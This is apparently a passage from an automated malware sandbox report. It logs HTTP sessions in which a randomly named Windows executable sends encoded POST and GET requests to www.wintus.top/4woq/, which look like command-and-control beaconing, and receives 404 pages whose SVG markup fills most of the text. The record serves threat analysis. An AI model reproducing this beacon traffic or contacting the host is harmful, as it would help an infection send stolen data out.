Jan 10, 2025 19:57:50.908349991 CET	1236	IN	Data Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
Jan 10, 2025 19:57:50.913333893 CET	1236	IN	Data Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	50005	162.0.213.94	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:52.827522039 CET	719	OUT	POST /4woq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.wintus.top Origin: http://www.wintus.top Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.wintus.top/4woq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 55 78 74 6b 36 50 4d 67 30 65 75 66 4b 67 6b 48 43 31 6a 51 49 48 34 42 45 45 68 45 34 35 67 70 34 42 7a 4b 4b 4d 75 34 34 54 77 5a 52 63 34 62 64 64 48 63 2f 73 6f 72 4f 68 72 2b 6b 4e 70 35 37 50 71 2f 4b 55 51 6f 59 53 78 7a 6f 56 43 2f 32 39 68 43 4d 4a 75 36 46 76 32 31 79 4e 42 51 75 4c 41 61 5a 72 4c 68 43 53 67 50 36 76 51 6c 2b 66 4a 62 5a 44 6e 43 32 4e 2b 73 33 4b 78 46 64 51 46 56 6d 31 70 59 4b 64 62 31 66 4c 5a 52 53 75 74 31 57 45 51 68 6e 77 4c 79 70 2b 48 44 41 4e 50 77 53 76 6f 5a 39 30 55 6c 70 71 4a 34 54 66 4f 37 72 44 4b 47 67 4b 58 51 65 48 72 7a 67 58 42 68 44 4b 2b 6d 45 59 54 69 4e 78 59 4d 59 34 68 4d 6b 42 31 6c 43 51 44 68 Data Ascii: QzmLxn8=Uxtk6PMg0eufKgkHC1jQIH4BEEhE45gp4BzKKMu44TwZRc4bddHc/sorOhr+kNp57Pq/KUQoYSxzoVC/29hCMJu6Fv21yNBQuLAaZrLhCSgP6vQl+fJbZDnC2N+s3KxFdQFVm1pYKdb1fLZRSut1WEQhnwLyp+HDANPwSvoZ90UlpqJ4TfO7rDKGgKXQeHrzgXBhDK+mEYTiNxYMY4hMkB1lCQDh
Jan 10, 2025 19:57:53.560177088 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:53 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 19:57:53.560194969 CET	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
Jan 10, 2025 19:57:53.560208082 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
Jan 10, 2025 19:57:53.560292006 CET	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
Jan 10, 2025 19:57:53.560303926 CET	1236	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
Jan 10, 2025 19:57:53.560314894 CET	1236	IN	Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
Jan 10, 2025 19:57:53.560328007 CET	1236	IN	Data Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
Jan 10, 2025 19:57:53.560340881 CET	1236	IN	Data Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
Jan 10, 2025 19:57:53.560355902 CET	776	IN	Data Raw: 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 Data Ascii: ke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7
Jan 10, 2025 19:57:53.560370922 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31 Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
Jan 10, 2025 19:57:53.565217018 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 33 2e 38 38 30 35 34 32 22 0a 20 Data Ascii: transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	50006	162.0.213.94	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:55.387485027 CET	1736	OUT	POST /4woq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.wintus.top Origin: http://www.wintus.top Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.wintus.top/4woq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 55 78 74 6b 36 50 4d 67 30 65 75 66 4b 67 6b 48 43 31 6a 51 49 48 34 42 45 45 68 45 34 35 67 70 34 42 7a 4b 4b 4d 75 34 34 54 34 5a 51 71 45 62 50 75 76 63 2b 73 6f 72 47 42 72 7a 6b 4e 70 6b 37 50 79 37 4b 55 63 34 59 52 4a 7a 70 33 4b 2f 77 49 56 43 43 4a 75 36 59 2f 32 30 74 64 42 2f 75 4c 51 65 5a 72 62 68 43 53 67 50 36 75 67 6c 77 64 78 62 66 44 6e 64 38 74 2b 67 6d 61 78 39 64 51 64 6a 6d 31 64 58 4c 73 37 31 66 71 70 52 51 59 78 31 66 45 51 30 69 77 4c 36 70 2b 4c 41 41 4a 75 65 53 76 74 32 39 32 45 6c 6b 65 4e 6c 49 37 61 69 79 56 57 53 68 36 2f 6b 47 47 50 6a 6e 6c 56 71 44 71 36 56 43 63 2f 2f 49 6e 41 34 63 49 38 41 38 6c 42 33 4e 41 36 4d 59 54 74 49 55 51 68 69 62 32 4a 63 71 66 5a 47 4f 2b 7a 6d 63 36 39 61 31 4e 75 4e 6b 6a 57 4b 39 69 69 6a 4d 50 52 64 48 49 6b 72 33 35 2f 2f 74 72 66 6f 70 4d 39 58 54 77 38 49 66 75 72 71 4b 79 33 4f 54 71 71 45 48 71 38 2f 36 77 73 77 56 52 4a 33 53 4b 54 58 54 5a 42 67 76 77 78 50 62 58 48 4c 4f 65 6d 43 42 45 39 68 66 79 [TRUNCATED] Data Ascii: QzmLxn8=Uxtk6PMg0eufKgkHC1jQIH4BEEhE45gp4BzKKMu44T4ZQqEbPuvc+sorGBrzkNpk7Py7KUc4YRJzp3K/wIVCCJu6Y/20tdB/uLQeZrbhCSgP6uglwdxbfDnd8t+gmax9dQdjm1dXLs71fqpRQYx1fEQ0iwL6p+LAAJueSvt292ElkeNlI7aiyVWSh6/kGGPjnlVqDq6VCc//InA4cI8A8lB3NA6MYTtIUQhib2JcqfZGO+zmc69a1NuNkjWK9iijMPRdHIkr35//trfopM9XTw8IfurqKy3OTqqEHq8/6wswVRJ3SKTXTZBgvwxPbXHLOemCBE9hfy+nrAGq2kAGmBOV3Q22j2chd/tnRhFl1hSyVvYaXoZGTUQeQBjQzpkVkk1uWfzdSayf3Y9gnw1Iw8Vg4PhcAL2mVSU0OJa25+UM32rVPY+IW0XSRywaqGbUWCGGHBlbCyHEakyIt6j9Sqh0ngDtKj4wpgSh/Ga58QjP//SRGsbWaJAMa56tuGzqlH4Eupc0PBKSCtV6wGdXq/pl5BS9V9/0XLPcOzM548JkkHCinq+bzAMz8q4uI35jGcYCHq1pmys/cC13SvUUDE2QwPUZp4o9zVM/2pjXTBDNUKetw4vzNrtK4BpOXZD3/bKXwP7QQUsnlg9pqWSxGstUkZX0vdgO7fs/fpFOIVgA6EDrrcy2cbfSM4a2w7P67vOUKBns4j6gceXj+qIJrQTiiamIOnNXnHEld7sXyOqFlWFjmSWsml/1a7mSsZT5o+5cE4Nhl4FJYlD0T3SPwfs4EFMFZ2gXdf/RcXj2RG64J9LWaMX0xkKHvBGTff4z4aElLJaq+Fzulr+/Gu9DmG0yIh0azuMvS4Q1IrBRkGmjSBHX0Ql9MNoWLx4xsbngTZgdZWaM+5+TBikd7pjB97GIBUD4DKvmgTdxEkPZs53ZogBhnV1s///3EJSh+Ip7rohLSAWOIMLKiuBXvCmxMbzfRWsI1UiSIJGJaT+ioUJx [TRUNCATED]
Jan 10, 2025 19:57:55.982645988 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:55 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 19:57:55.982673883 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 10, 2025 19:57:55.982688904 CET	448	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 10, 2025 19:57:55.982943058 CET	1236	IN	Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36 Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
Jan 10, 2025 19:57:55.982954979 CET	1236	IN	Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31 Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
Jan 10, 2025 19:57:55.982960939 CET	1236	IN	Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20 Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
Jan 10, 2025 19:57:55.982971907 CET	672	IN	Data Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20 Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
Jan 10, 2025 19:57:55.982995987 CET	1236	IN	Data Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
Jan 10, 2025 19:57:55.983007908 CET	1236	IN	Data Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.23791
Jan 10, 2025 19:57:55.983019114 CET	1236	IN	Data Raw: 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 36 31 34 31 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 Data Ascii: :inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.
Jan 10, 2025 19:57:55.987565041 CET	1236	IN	Data Raw: 20 20 63 79 3d 22 31 36 34 2e 35 37 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 33 32 31 2e 34 32 32 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	50007	162.0.213.94	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:58.008213997 CET	441	OUT	GET /4woq/?QzmLxn8=ZzFE54Yh+eSeCT8FF0zNBnoZDDByraM682bOLpiy7hQBP+BdXfTm3u46Ly/FvI4MxOK+Clx1PQVPu2KUvv9MKfeNOqebtOdcsMY+XeS2Ki1dxMRhw9VWTBGVxPaM2L4KFw==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.wintus.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:57:58.813318968 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:58 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 